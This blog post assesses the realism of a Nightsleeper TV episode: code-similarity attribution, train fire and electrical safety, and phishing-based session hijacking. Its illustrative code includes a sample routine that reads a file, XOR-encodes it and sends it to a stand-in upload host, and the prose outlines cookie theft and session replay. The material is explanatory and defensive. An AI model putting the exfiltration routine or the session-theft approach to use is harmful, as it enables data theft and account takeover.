Analysing BBC's New TV Show - Nightsleeper - Episode 4

Here we go again! Hopefully you have read the previous three assessments and will know what I am trying to achieve with these breakdowns. But just in case you haven't, here is a little background.

The BBC has released a gripping new drama depicting a coordinated, national cyber attack against the UK rail network. Whilst there has clearly been some consulting done on this show (the buzzword bingo is never ending), the consulting has fallen short in some key areas, and this has led to the show using wild levels of creative licence.

These analyses aim to break down key themes within the show, explain in a bit more detail which are real and which are not and why that's the case, and provide some actual context for how they may play out in the event of a real attack.

With that said, you can find links to the show and previous reviews at the end of this article.

Now, let's get into it (this one is a lot shorter, as there was less technical involvement in this episode):

Comparing Code Libraries

During the episode, we see the NCSC battling to trace the origins of the attack by comparing the code taken from the Single Board Computer (SBC) on Nightsleeper with code samples held in their databases. Whilst to non-technical people this may seem like an unlikely scenario, it is actually a legitimate mechanism for tracing the origins of attacks.

Most capable hacking groups are made up of black/grey hat hackers who have executed multiple smaller attacks themselves before earning the right to be part of the team carrying out a bigger attack. This means the signature of the code they used, and the details of the person the authorities believe wrote the code, will be held in databases for the authorities' use in the future. Almost like the fingerprints of someone who has been arrested before.

The other factor that makes this mechanism effective is that humans are creatures of habit. When a hacker writes code that works, they don’t want to keep reinventing the wheel. They will use sections of previous code time and time again, with minor tweaks, to achieve similar objectives in different attacks. This is because the effort required to create a different approach and code it out would make the mobilisation and testing time for an attack too long and increase their likelihood of being caught. They need to use code they know they can trust to work, get in and get out before systems detect them and shut them down.

What is an interesting turn, and will make tracing attacks harder, is the emergence of Artificial Intelligence (AI). This has enabled coders to automatically regenerate code, changing the language used, the syntax formats and the signature styles within the code in a fraction of the time it would take to code the same thing manually. This means that an attacker could use the same basic code with every attack, but with bespoke execution code every time.
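To show why the comparison in this scene still works after the "minor tweaks" described above, here is an added example (my own, not the show's or any NCSC tooling): it strips identifiers and literals out of two constructed snippets and scores their shared structure with token 4-grams, so renamed variables, a changed URL and an extra line still score highly while an unrelated function does not. The samples, the KEEP set and the n-gram size are my assumptions.

```python
import re
# Constructed samples for illustration only; not taken from the show or any real database.
KNOWN_SAMPLE = """
def collect(path):
    data = open(path, 'rb').read()
    key = 0x5A
    out = bytes(b ^ key for b in data)
    send_home(out, 'http://example.invalid/upload')
"""
# Same routine after the "minor tweaks" the text describes: renamed variables, new URL, one extra line.
TWEAKED_SAMPLE = """
def grab(target):
    blob = open(target, 'rb').read()
    blob = blob[:4096]
    k = 0x5A
    enc = bytes(c ^ k for c in blob)
    send_home(enc, 'http://example.invalid/drop')
"""
UNRELATED_SAMPLE = """
def load_config(name):
    with open(name) as fh:
        cfg = json.load(fh)
    return cfg.get('timeout', 30)
"""
_TOKEN = re.compile(r"[A-Za-z_]\w*|0x[0-9A-Fa-f]+|\d+|'[^']*'|\"[^\"]*\"|[^\s\w]")
# Keywords and builtins are kept verbatim (assumed list); everything else collapses to a placeholder.
KEEP = {"def", "return", "with", "import", "for", "in", "as", "if", "else", "while", "bytes", "open", "read"}

def normalise(src):
    """Identifiers -> ID, literals -> STR/NUM; keywords, operators and punctuation stay as they are."""
    out = []
    for tok in _TOKEN.findall(src):
        if tok in KEEP or not (tok[0].isalnum() or tok[0] in "_'\""):
            out.append(tok)          # keyword, operator or punctuation: carries the structure
        elif tok[0] in "'\"":
            out.append("STR")        # string literal (URLs, file modes) hidden behind one token
        elif tok[0].isdigit():
            out.append("NUM")
        else:
            out.append("ID")         # any user-chosen name: renaming it changes nothing here
    return out

def ngrams(tokens, n=4):
    return {tuple(tokens[i:i + n]) for i in range(len(tokens) - n + 1)}

def similarity(a, b, n=4):
    """Jaccard similarity of normalised token n-grams: 1.0 is identical structure, 0.0 shares nothing."""
    ga, gb = ngrams(normalise(a), n), ngrams(normalise(b), n)
    return len(ga & gb) / len(ga | gb) if (ga or gb) else 0.0
```

The same check does not survive the wholesale language rewrite the paragraph above attributes to AI, which is exactly why that development makes attribution harder.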

Fire & Electrical Damage

For you cyber guys, sorry, this section is likely to be less interesting to you; for all you engineers, listen in!

The electrical systems that pass between carriages on trains can run on any number of different voltages and currents, from 12V to 750V and from 1-2 amps up to thousands of amps. For the shots fired at the train by police to damage the electrical systems in such a way that a fire started, there is a high likelihood that at least some electrical systems would have been shorted out.

On most modern trains, the electrical systems are protected by an earth leakage detection circuit breaker, and potentially Residual Current Devices (RCDs). Damage of the nature seen on Nightsleeper would result in at least one of those systems shorting to earth, especially when sprayed with a fire extinguisher in the way that shorted out a door switch in the show. This short to earth would then trip the earth leakage circuit breaker, which drops the feed to most control systems by cutting the feed to relays. This would have removed traction capability, dropped out multiple safety systems and brought in the emergency brakes.

Further to that, even if by some stretch the damage and subsequent fire did not short the electrics out, the activation of the fire alarm on most modern passenger units will cut traction, activate the emergency brakes and automatically discharge fire suppression systems where fitted. The driver would have the option to delay the discharge of suppression medium and restore subsystems for a limited time to ensure that the train can move to a more suitable location, but the initial response would be automatic.

Given there is no driver on board the train, and the button to hold off the fire alarm is a manually activated electrical circuit, there is no way to remotely override this, so the fire would have brought the train to a stop.

Email Hacking Using Session Hijacking

At one point in the show, we see the NCSC technical director gain access to the email account of the director general by sending her a bespoke link in a phishing email.

Despite how it seems on the show, this is a realistic mechanism for gaining access to a secure account. Before you think 'there is no way someone in the cyber sphere would fall foul of an obvious phishing attack', remember these people are human, in a high-pressure environment, and this phishing attack was crafted by a cyber expert with targeted knowledge of the scenario they were working through.

Now, how would that work? How does sending a link to someone get you access to their email account? Well, while the technical director was at the computer we see her selecting from lists of exploits, creating a local web server, and sending the link. The most likely scenario being used here is to send a link to a file containing an exploit. That exploit would do one of two things:

  1. The first method is to create a reverse connection to the device that would allow the sender to explore data on the device; the sender would then need to go through the device to find what they're looking for (unlikely in this scenario, as the director general's device would have detected a reverse connection).

  2. The second, and in my opinion the most likely, method is that a script is executed on the device that collects cookies, session keys and personal information for specific apps and sends this back to the sender's web server. The session keys and data held within cookies can then potentially be used in replay attacks to trick a server into thinking the session is already authenticated and grant access.

Don't worry, this type of attack is not particularly easy to carry out: the script would often be detected by anti-malware software when downloaded, and replaying the data successfully takes skill. Steps you can take to protect yourself include never clicking on links you were not expecting to receive, using two-factor authentication to secure your accounts, and using a reputable service provider for your data to maximise the likelihood of their servers being hardened against a session being connected from multiple IP addresses at the same time.
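As an added illustration of that last mitigation (my own example, not from the article or any particular mail provider), the check below runs over constructed access-log lines and flags any session identifier that is used from more than one source IP within a short window, the pattern a replayed cookie produces; the log format, field names and five-minute window are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed log lines (not from any real system): timestamp, source IP, session id, method, path.
# Session a1b2c3 is used from two addresses six seconds apart; d4e5f6 changes address after 89 minutes.
SAMPLE_LOG = """\
2024-09-20T10:00:01Z 203.0.113.7 sid=a1b2c3 GET /mail/inbox
2024-09-20T10:00:09Z 203.0.113.7 sid=a1b2c3 GET /mail/read/42
2024-09-20T10:00:15Z 198.51.100.9 sid=a1b2c3 GET /mail/inbox
2024-09-20T10:00:20Z 203.0.113.7 sid=a1b2c3 GET /mail/search?q=rail
2024-09-20T10:01:00Z 192.0.2.44 sid=d4e5f6 GET /mail/inbox
2024-09-20T11:30:00Z 192.0.2.45 sid=d4e5f6 GET /mail/inbox
"""
LINE = re.compile(r"^(\S+) (\S+) sid=(\S+) (\S+) (\S+)$")

def parse(log_text):
    """Yield (timestamp, source_ip, session_id) for each well-formed line; skip anything else."""
    for raw in log_text.splitlines():
        m = LINE.match(raw)
        if not m:
            continue
        yield datetime.strptime(m.group(1), "%Y-%m-%dT%H:%M:%SZ"), m.group(2), m.group(3)

def concurrent_ip_sessions(log_text, window=timedelta(minutes=5)):
    """Return {session_id: sorted IPs} for sessions seen from more than one IP within `window`.

    A slow address change (laptop moved to a new network) stays below the window and is not
    flagged; two addresses using the same session within seconds of each other is.
    """
    last_seen = defaultdict(dict)      # session id -> {ip: time of its most recent request}
    flagged = {}
    for ts, ip, sid in parse(log_text):
        seen = last_seen[sid]
        seen[ip] = ts
        others = [o for o, t in seen.items() if o != ip and ts - t <= window]
        if others:
            flagged.setdefault(sid, set()).update(others + [ip])
    return {sid: sorted(ips) for sid, ips in flagged.items()}
```

A provider that runs this kind of check can invalidate the session and force re-authentication, which is what the text means by servers being hardened against a session connected from multiple IP addresses at once.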

If you found this content engaging, and would like to get in touch, please visit the website, or get in touch with me directly at [email protected].
